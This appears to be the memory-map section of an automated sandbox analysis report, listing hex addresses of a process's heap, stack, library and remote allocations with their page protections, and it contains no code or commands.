|
heap
|
page read and write
|
||
|
6186000
|
heap
|
page read and write
|
||
|
8630000
|
direct allocation
|
page read and write
|
||
|
2145E000
|
stack
|
page read and write
|
||
|
4721000
|
heap
|
page read and write
|
||
|
5EDA000
|
heap
|
page read and write
|
||
|
4D0E000
|
heap
|
page read and write
|
||
|
21CF8000
|
heap
|
page read and write
|
||
|
86A0000
|
direct allocation
|
page read and write
|
||
|
8610000
|
trusted library allocation
|
page execute and read and write
|
||
|
F7A2BFE000
|
stack
|
page read and write
|
||
|
7FFD34700000
|
trusted library allocation
|
page execute and read and write
|
||
|
4433000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
4711000
|
heap
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
4D38000
|
heap
|
page read and write
|
||
|
4F00000
|
trusted library allocation
|
page read and write
|
||
|
2710000
|
heap
|
page read and write
|
||
|
2199E000
|
stack
|
page read and write
|
||
|
4709000
|
heap
|
page read and write
|
||
|
2440A200000
|
trusted library allocation
|
page read and write
|
||
|
F7A2EF9000
|
stack
|
page read and write
|
||
|
224F6000
|
unclassified section
|
page execute and read and write
|
||
|
441F000
|
stack
|
page read and write
|
||
|
6DD0000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
27CB000
|
stack
|
page read and write
|
||
|
244065F1000
|
heap
|
page read and write
|
||
|
21F1F000
|
heap
|
page read and write
|
||
|
5EA0000
|
direct allocation
|
page read and write
|
||
|
7170000
|
heap
|
page read and write
|
||
|
2FC3000
|
heap
|
page read and write
|
||
|
4971000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
4743000
|
heap
|
page read and write
|
||
|
21050000
|
direct allocation
|
page read and write
|
||
|
8690000
|
direct allocation
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
|
5D70000
|
heap
|
page read and write
|
||
|
2D8D000
|
heap
|
page read and write
|
||
|
2D0E000
|
unkown
|
page read and write
|
||
|
4D0D000
|
heap
|
page read and write
|
||
|
2BB8000
|
heap
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
21080000
|
direct allocation
|
page read and write
|
||
|
24408020000
|
trusted library allocation
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
24408B67000
|
trusted library allocation
|
page read and write
|
||
|
2AE5000
|
heap
|
page read and write
|
||
|
7FFD34827000
|
trusted library allocation
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
24420972000
|
heap
|
page read and write
|
||
|
21020000
|
direct allocation
|
page read and write
|
||
|
21AAD000
|
stack
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
20FB0000
|
direct allocation
|
page read and write
|
||
|
21F1F000
|
heap
|
page read and write
|
||
|
77B0000
|
heap
|
page read and write
|
||
|
4D32000
|
heap
|
page read and write
|
||
|
244206D0000
|
heap
|
page execute and read and write
|
||
|
7E90000
|
trusted library allocation
|
page read and write
|
||
|
4D1C000
|
heap
|
page read and write
|
||
|
56D1000
|
trusted library allocation
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
21BE6000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD346F6000
|
trusted library allocation
|
page read and write
|
||
|
4D22000
|
heap
|
page read and write
|
||
|
8670000
|
direct allocation
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
4420000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
2D83000
|
heap
|
page read and write
|
||
|
4D2A000
|
heap
|
page read and write
|
||
|
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
7288000
|
trusted library allocation
|
page read and write
|
||
|
27E4000
|
stack
|
page read and write
|
||
|
2C2A000
|
heap
|
page read and write
|
||
|
217B0000
|
direct allocation
|
page read and write
|
||
|
4D4E000
|
heap
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
4D1C000
|
heap
|
page read and write
|
||
|
24420A50000
|
heap
|
page execute and read and write
|
||
|
7FFD34825000
|
trusted library allocation
|
page read and write
|
||
|
21BA0000
|
unclassified section
|
page execute and read and write
|
||
|
847E000
|
stack
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
224A0000
|
unclassified section
|
page execute and read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
725E000
|
heap
|
page read and write
|
||
|
2B9E000
|
stack
|
page read and write
|
||
|
31CF000
|
unkown
|
page read and write
|
||
|
4D01000
|
heap
|
page read and write
|
||
|
24407FD0000
|
trusted library allocation
|
page read and write
|
||
|
2AE5000
|
heap
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
4D01000
|
heap
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
27E2000
|
stack
|
page read and write
|
||
|
2899000
|
stack
|
page read and write
|
||
|
7F60000
|
trusted library allocation
|
page read and write
|
||
|
24406540000
|
heap
|
page read and write
|
||
|
4715000
|
heap
|
page read and write
|
||
|
2442064B000
|
heap
|
page read and write
|
||
|
4D00000
|
trusted library allocation
|
page read and write
|
||
|
21960000
|
remote allocation
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
81FE000
|
stack
|
page read and write
|
||
|
471F000
|
heap
|
page read and write
|
||
|
2E36000
|
heap
|
page read and write
|
||
|
5F6F000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
8010000
|
heap
|
page read and write
|
||
|
219DF000
|
stack
|
page read and write
|
||
|
5F04000
|
heap
|
page read and write
|
||
|
21F1B000
|
heap
|
page read and write
|
||
|
6BCB000
|
stack
|
page read and write
|
||
|
24408010000
|
heap
|
page readonly
|
||
|
21C80000
|
heap
|
page read and write
|
||
|
20FC0000
|
direct allocation
|
page read and write
|
||
|
472A000
|
heap
|
page read and write
|
||
|
4818000
|
trusted library allocation
|
page read and write
|
||
|
51E000
|
stack
|
page read and write
|
||
|
6C8D000
|
stack
|
page read and write
|
||
|
4970000
|
heap
|
page read and write
|
||
|
5DC5000
|
heap
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
F7A27FF000
|
stack
|
page read and write
|
||
|
244205CA000
|
heap
|
page read and write
|
||
|
4440000
|
trusted library allocation
|
page read and write
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
F7A2DFE000
|
stack
|
page read and write
|
||
|
72FE000
|
stack
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
21D05000
|
heap
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
4716000
|
heap
|
page read and write
|
||
|
2C1E000
|
stack
|
page read and write
|
||
|
2E39000
|
heap
|
page read and write
|
||
|
2441871A000
|
trusted library allocation
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
473F000
|
heap
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
F7A27B5000
|
stack
|
page read and write
|
||
|
21D57000
|
heap
|
page read and write
|
||
|
F7A30FE000
|
stack
|
page read and write
|
||
|
F7A3DCB000
|
stack
|
page read and write
|
||
|
2182E000
|
stack
|
page read and write
|
||
|
701E000
|
stack
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
7179000
|
heap
|
page read and write
|
||
|
21B2D000
|
stack
|
page read and write
|
||
|
72A0000
|
trusted library allocation
|
page read and write
|
||
|
2AE5000
|
heap
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
4D0D000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
21BBB000
|
unclassified section
|
page execute and read and write
|
||
|
4C04000
|
heap
|
page read and write
|
||
|
45E0000
|
trusted library allocation
|
page read and write
|
||
|
21D05000
|
heap
|
page read and write
|
||
|
5FA6000
|
heap
|
page read and write
|
||
|
F7A3079000
|
stack
|
page read and write
|
||
|
21060000
|
direct allocation
|
page read and write
|
||
|
5FB6000
|
heap
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page read and write
|
||
|
588000
|
heap
|
page read and write
|
||
|
2B3A000
|
heap
|
page read and write
|
||
|
21BD1000
|
direct allocation
|
page execute and read and write
|
||
|
6F9E000
|
stack
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
2D8D000
|
heap
|
page read and write
|
||
|
22021000
|
heap
|
page read and write
|
||
|
F7A2C7E000
|
stack
|
page read and write
|
||
|
4700000
|
heap
|
page read and write
|
||
|
6A7F000
|
stack
|
page read and write
|
||
|
6DCC000
|
stack
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
2900000
|
heap
|
page read and write
|
||
|
7FA7000
|
trusted library allocation
|
page read and write
|
||
|
5FB6000
|
heap
|
page read and write
|
||
|
8268000
|
heap
|
page read and write
|
||
|
2750000
|
heap
|
page read and write
|
||
|
21DF9000
|
heap
|
page read and write
|
||
|
4D08000
|
heap
|
page read and write
|
||
|
80BC000
|
stack
|
page read and write
|
||
|
4D08000
|
heap
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page execute and read and write
|
||
|
27AC000
|
stack
|
page read and write
|
||
|
2247D000
|
unclassified section
|
page execute and read and write
|
||
|
2E1F000
|
unkown
|
page read and write
|
||
|
4450000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
2440662A000
|
heap
|
page read and write
|
||
|
472E000
|
heap
|
page read and write
|
||
|
7FD30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7247000
|
heap
|
page read and write
|
||
|
4D23000
|
heap
|
page read and write
|
||
|
4D01000
|
heap
|
page read and write
|
||
|
7240000
|
heap
|
page read and write
|
||
|
4D1C000
|
heap
|
page read and write
|
||
|
4D27000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
4B6F000
|
stack
|
page read and write
|
||
|
8248000
|
heap
|
page read and write
|
||
|
24406616000
|
heap
|
page read and write
|
||
|
24408971000
|
trusted library allocation
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
4D0D000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
7189000
|
heap
|
page read and write
|
||
|
829B000
|
heap
|
page read and write
|
||
|
5FC9000
|
heap
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
24420931000
|
heap
|
page read and write
|
||
|
2B6D000
|
heap
|
page read and write
|
||
|
2DAA000
|
heap
|
page read and write
|
||
|
F7A2FF7000
|
stack
|
page read and write
|
||
|
85C0000
|
direct allocation
|
page read and write
|
||
|
71B3000
|
heap
|
page read and write
|
||
|
24420584000
|
heap
|
page read and write
|
||
|
F7A2B7D000
|
stack
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
5F6F000
|
heap
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
5FBB000
|
heap
|
page read and write
|
||
|
2440A204000
|
trusted library allocation
|
page read and write
|
||
|
F7A31FE000
|
stack
|
page read and write
|
||
|
24420956000
|
heap
|
page read and write
|
||
|
6D8D000
|
stack
|
page read and write
|
||
|
473E000
|
heap
|
page read and write
|
||
|
2974000
|
heap
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
244084EE000
|
trusted library allocation
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
8600000
|
direct allocation
|
page read and write
|
||
|
2E6E000
|
unkown
|
page read and write
|
||
|
5FA5000
|
heap
|
page read and write
|
||
|
2442086C000
|
heap
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
5FBB000
|
heap
|
page read and write
|
||
|
4D14000
|
heap
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
4462000
|
trusted library allocation
|
page read and write
|
||
|
5A93000
|
remote allocation
|
page execute and read and write
|
||
|
4772000
|
heap
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
24408AC5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F3E000
|
stack
|
page read and write
|
||
|
4460000
|
trusted library allocation
|
page read and write
|
||
|
244088FD000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3465B000
|
trusted library allocation
|
page read and write
|
||
|
44CE000
|
stack
|
page read and write
|
||
|
2442089A000
|
heap
|
page read and write
|
||
|
21030000
|
direct allocation
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
82AF000
|
heap
|
page read and write
|
||
|
27DE000
|
unkown
|
page read and write
|
||
|
486F000
|
stack
|
page read and write
|
||
|
4D01000
|
heap
|
page read and write
|
||
|
22420000
|
unclassified section
|
page execute and read and write
|
||
|
28CC000
|
stack
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
2BBD000
|
stack
|
page read and write
|
||
|
2FCD000
|
heap
|
page read and write
|
||
|
24406652000
|
heap
|
page read and write
|
||
|
2B5E000
|
stack
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
F7A2AFE000
|
stack
|
page read and write
|
||
|
7FFD34643000
|
trusted library allocation
|
page execute and read and write
|
||
|
56C1000
|
trusted library allocation
|
page read and write
|
||
|
244068F0000
|
heap
|
page read and write
|
||
|
85D0000
|
direct allocation
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
6D4B000
|
stack
|
page read and write
|
||
|
6FDE000
|
stack
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
21EEC000
|
heap
|
page read and write
|
||
|
2442058D000
|
heap
|
page read and write
|
||
|
F7A2CFB000
|
stack
|
page read and write
|
||
|
A5F000
|
stack
|
page read and write
|
||
|
4D1B000
|
heap
|
page read and write
|
||
|
4538000
|
heap
|
page read and write
|
||
|
45CE000
|
stack
|
page read and write
|
||
|
4D24000
|
heap
|
page read and write
|
||
|
2440656D000
|
heap
|
page read and write
|
||
|
21B6E000
|
stack
|
page read and write
|
||
|
2441874C000
|
trusted library allocation
|
page read and write
|
||
|
828D000
|
heap
|
page read and write
|
||
|
29BB000
|
heap
|
page read and write
|
||
|
21D80000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
22080000
|
heap
|
page read and write
|
||
|
4D0D000
|
heap
|
page read and write
|
||
|
6180000
|
heap
|
page read and write
|
||
|
57F000
|
stack
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
F7A3D4D000
|
stack
|
page read and write
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
2BA0000
|
trusted library section
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
4693000
|
remote allocation
|
page execute and read and write
|
||
|
4D14000
|
heap
|
page read and write
|
||
|
4D27000
|
heap
|
page read and write
|
||
|
24407FB0000
|
heap
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
5093000
|
remote allocation
|
page execute and read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
21010000
|
direct allocation
|
page read and write
|
||
|
4449000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3464D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F66000
|
heap
|
page read and write
|
||
|
4D10000
|
heap
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
7480000
|
trusted library allocation
|
page read and write
|
||
|
4D3D000
|
heap
|
page read and write
|
||
|
4D0F000
|
heap
|
page read and write
|
||
|
44D0000
|
heap
|
page readonly
|
||
|
4B20000
|
trusted library allocation
|
page read and write
|
||
|
21A2C000
|
stack
|
page read and write
|
||
|
8000000
|
trusted library allocation
|
page read and write
|
||
|
5FBB000
|
heap
|
page read and write
|
||
|
F7A2D7E000
|
stack
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
6170000
|
direct allocation
|
page read and write
|
||
|
5FBB000
|
heap
|
page read and write
|
||
|
244208FF000
|
heap
|
page read and write
|
||
|
24420570000
|
heap
|
page read and write
|
||
|
84C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2ABD000
|
stack
|
page read and write
|
||
|
24408461000
|
trusted library allocation
|
page read and write
|
||
|
289D000
|
stack
|
page read and write
|
||
|
24408030000
|
heap
|
page read and write
|
||
|
4D48000
|
heap
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
24420884000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
46B0000
|
heap
|
page execute and read and write
|
||
|
4718000
|
heap
|
page read and write
|
||
|
24408FF7000
|
trusted library allocation
|
page read and write
|
||
|
24418470000
|
trusted library allocation
|
page read and write
|
||
|
7430000
|
trusted library allocation
|
page read and write
|
||
|
213E0000
|
heap
|
page read and write
|
||
|
21D04000
|
heap
|
page read and write
|
||
|
F7A2E7D000
|
stack
|
page read and write
|
||
|
244083A0000
|
heap
|
page read and write
|
||
|
5FB4000
|
heap
|
page read and write
|
||
|
294C000
|
heap
|
page read and write
|
||
|
244083B0000
|
trusted library allocation
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
7DF405570000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
85F0000
|
direct allocation
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
4D01000
|
heap
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
4D0F000
|
heap
|
page read and write
|
||
|
5EC0000
|
direct allocation
|
page read and write
|
||
|
24418461000
|
trusted library allocation
|
page read and write
|
||
|
4D37000
|
heap
|
page read and write
|
||
|
4700000
|
heap
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
2D4E000
|
stack
|
page read and write
|
||
|
6160000
|
direct allocation
|
page read and write
|
||
|
244083E0000
|
trusted library allocation
|
page read and write
|
||
|
853E000
|
stack
|
page read and write
|
||
|
F7A3E4B000
|
stack
|
page read and write
|
||
|
21D14000
|
heap
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
24406610000
|
heap
|
page read and write
|
||
|
50CC000
|
trusted library allocation
|
page read and write
|
||
|
2442066C000
|
heap
|
page read and write
|
||
|
21070000
|
direct allocation
|
page read and write
|
||
|
244088EC000
|
trusted library allocation
|
page read and write
|
||
|
4710000
|
heap
|
page read and write
|
||
|
21540000
|
heap
|
page read and write
|
||
|
2440660E000
|
heap
|
page read and write
|
||
|
4D08000
|
heap
|
page read and write
|
||
|
217D0000
|
direct allocation
|
page read and write
|
||
|
4D2A000
|
heap
|
page read and write
|
||
|
2441875A000
|
trusted library allocation
|
page read and write
|
||
|
2B6D000
|
heap
|
page read and write
|
||
|
2D2F000
|
unkown
|
page read and write
|
||
|
44E0000
|
heap
|
page read and write
|
||
|
2149F000
|
stack
|
page read and write
|
||
|
4D1C000
|
heap
|
page read and write
|
||
|
21C81000
|
heap
|
page read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
27DF000
|
stack
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
4F00000
|
trusted library allocation
|
page read and write
|
||
|
4716000
|
heap
|
page read and write
|
||
|
2170F000
|
stack
|
page read and write
|
||
|
2BFE000
|
stack
|
page read and write
|
||
|
24408000000
|
trusted library allocation
|
page read and write
|
||
|
4D0F000
|
heap
|
page read and write
|
||
|
285B000
|
stack
|
page read and write
|
||
|
2970000
|
heap
|
page read and write
|
||
|
7FFD34726000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34800000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F68000
|
heap
|
page read and write
|
||
|
2AE5000
|
heap
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
4772000
|
heap
|
page read and write
|
||
|
85B0000
|
direct allocation
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
24420850000
|
heap
|
page read and write
|
||
|
22050000
|
heap
|
page read and write
|
||
|
7FFD346FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
718D000
|
heap
|
page read and write
|
||
|
6AFF000
|
stack
|
page read and write
|
||
|
5ED0000
|
heap
|
page read and write
|
||
|
82FA000
|
heap
|
page read and write
|
||
|
24420925000
|
heap
|
page read and write
|
||
|
56E9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347FA000
|
trusted library allocation
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
719B000
|
heap
|
page read and write
|
||
|
22479000
|
unclassified section
|
page execute and read and write
|
||
|
6C4E000
|
stack
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
8680000
|
direct allocation
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
5FB6000
|
heap
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
85E0000
|
direct allocation
|
page read and write
|
||
|
4D0F000
|
heap
|
page read and write
|
||
|
2910000
|
heap
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
3B20000
|
remote allocation
|
page execute and read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
2F9F000
|
unkown
|
page read and write
|
||
|
21F1F000
|
heap
|
page read and write
|
||
|
4D0D000
|
heap
|
page read and write
|
||
|
20FD0000
|
direct allocation
|
page read and write
|
||
|
5FB6000
|
heap
|
page read and write
|
||
|
723A000
|
heap
|
page read and write
|
||
|
4D38000
|
heap
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
823E000
|
stack
|
page read and write
|
||
|
81A0000
|
heap
|
page read and write
|
||
|
6ABE000
|
stack
|
page read and write
|
||
|
F7A2F77000
|
stack
|
page read and write
|
||
|
24409A19000
|
trusted library allocation
|
page read and write
|
||
|
467E000
|
stack
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
4D14000
|
heap
|
page read and write
|
||
|
2B6D000
|
heap
|
page read and write
|
||
|
2440A1F2000
|
trusted library allocation
|
page read and write
|
||
|
7FAB000
|
trusted library allocation
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
2442088C000
|
heap
|
page read and write
|
||
|
452E000
|
stack
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
47D9000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
217C0000
|
direct allocation
|
page read and write
|
||
|
4D01000
|
heap
|
page read and write
|
||
|
7F90000
|
trusted library allocation
|
page read and write
|
||
|
7FA0000
|
trusted library allocation
|
page read and write
|
||
|
2B6E000
|
heap
|
page read and write
|
||
|
AC33000
|
direct allocation
|
page execute and read and write
|
||
|
21D31000
|
heap
|
page read and write
|
||
|
7FB0000
|
trusted library allocation
|
page read and write
|
||
|
4D3D000
|
heap
|
page read and write
|
||
|
5DC0000
|
heap
|
page read and write
|
||
|
217E0000
|
direct allocation
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
22493000
|
unclassified section
|
page execute and read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
5F61000
|
heap
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
445A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
285C000
|
stack
|
page read and write
|
||
|
24406560000
|
heap
|
page read and write
|
||
|
21F8F000
|
heap
|
page read and write
|
||
|
7FFD34642000
|
trusted library allocation
|
page read and write
|
||
|
82D8000
|
heap
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
4700000
|
heap
|
page read and write
|
||
|
4D0C000
|
heap
|
page read and write
|
||
|
2440660C000
|
heap
|
page read and write
|
||
|
46DF000
|
stack
|
page read and write
|
||
|
4D08000
|
heap
|
page read and write
|
||
|
5FC0000
|
heap
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
4711000
|
heap
|
page read and write
|
||
|
21E73000
|
heap
|
page read and write
|
||
|
7E77000
|
stack
|
page read and write
|
||
|
5FC0000
|
heap
|
page read and write
|
||
|
2C20000
|
trusted library section
|
page read and write
|
||
|
4D27000
|
heap
|
page read and write
|
||
|
3C93000
|
remote allocation
|
page execute and read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
4D32000
|
heap
|
page read and write
|
||
|
4F00000
|
trusted library allocation
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
21BD0000
|
direct allocation
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
737E000
|
stack
|
page read and write
|
||
|
5D60000
|
heap
|
page readonly
|
||
|
24406730000
|
heap
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
6C0E000
|
stack
|
page read and write
|
||
|
4480000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
|
4F00000
|
trusted library allocation
|
page read and write
|
||
|
24420632000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page readonly
|
||
|
5FC0000
|
heap
|
page read and write
|
||
|
20FF0000
|
direct allocation
|
page read and write
|
||
|
24420660000
|
heap
|
page read and write
|
||
|
458C000
|
stack
|
page read and write
|
||
|
2442046D000
|
heap
|
page read and write
|
||
|
4D27000
|
heap
|
page read and write
|
||
|
2440A1DC000
|
trusted library allocation
|
page read and write
|
||
|
4D27000
|
heap
|
page read and write
|
||
|
46E0000
|
heap
|
page read and write
|
||
|
7082000
|
heap
|
page read and write
|
||
|
2898000
|
stack
|
page read and write
|
||
|
5FA5000
|
heap
|
page read and write
|
||
|
A1E000
|
stack
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
8055000
|
trusted library allocation
|
page read and write
|
||
|
216CE000
|
stack
|
page read and write
|
||
|
4D27000
|
heap
|
page read and write
|
||
|
21D14000
|
heap
|
page read and write
|
||
|
21CF8000
|
heap
|
page read and write
|
||
|
45D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AE5000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
8CC0000
|
direct allocation
|
page execute and read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
2AE5000
|
heap
|
page read and write
|
||
|
463E000
|
stack
|
page read and write
|
||
|
2440A216000
|
trusted library allocation
|
page read and write
|
||
|
2F23000
|
heap
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
5F6C000
|
heap
|
page read and write
|
||
|
21000000
|
direct allocation
|
page read and write
|
||
|
F7A32FB000
|
stack
|
page read and write
|
||
|
2FCC000
|
heap
|
page read and write
|
||
|
7F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C3B000
|
heap
|
page read and write
|
||
|
24420750000
|
heap
|
page read and write
|
||
|
73BD000
|
stack
|
page read and write
|
||
|
4D0B000
|
heap
|
page read and write
|
||
|
733E000
|
stack
|
page read and write
|
||
|
21960000
|
remote allocation
|
page read and write
|
||
|
4716000
|
heap
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
819B000
|
stack
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
4434000
|
trusted library allocation
|
page read and write
|
||
|
8E33000
|
direct allocation
|
page execute and read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
5FB6000
|
heap
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
244068F5000
|
heap
|
page read and write
|
||
|
4D0F000
|
heap
|
page read and write
|
||
|
21960000
|
remote allocation
|
page read and write
|
||
|
244205B4000
|
heap
|
page read and write
|
||
|
21A6C000
|
stack
|
page read and write
|
||
|
8240000
|
heap
|
page read and write
|
||
|
5FAF000
|
heap
|
page read and write
|
||
|
24408FE2000
|
trusted library allocation
|
page read and write
|
||
|
27C6000
|
stack
|
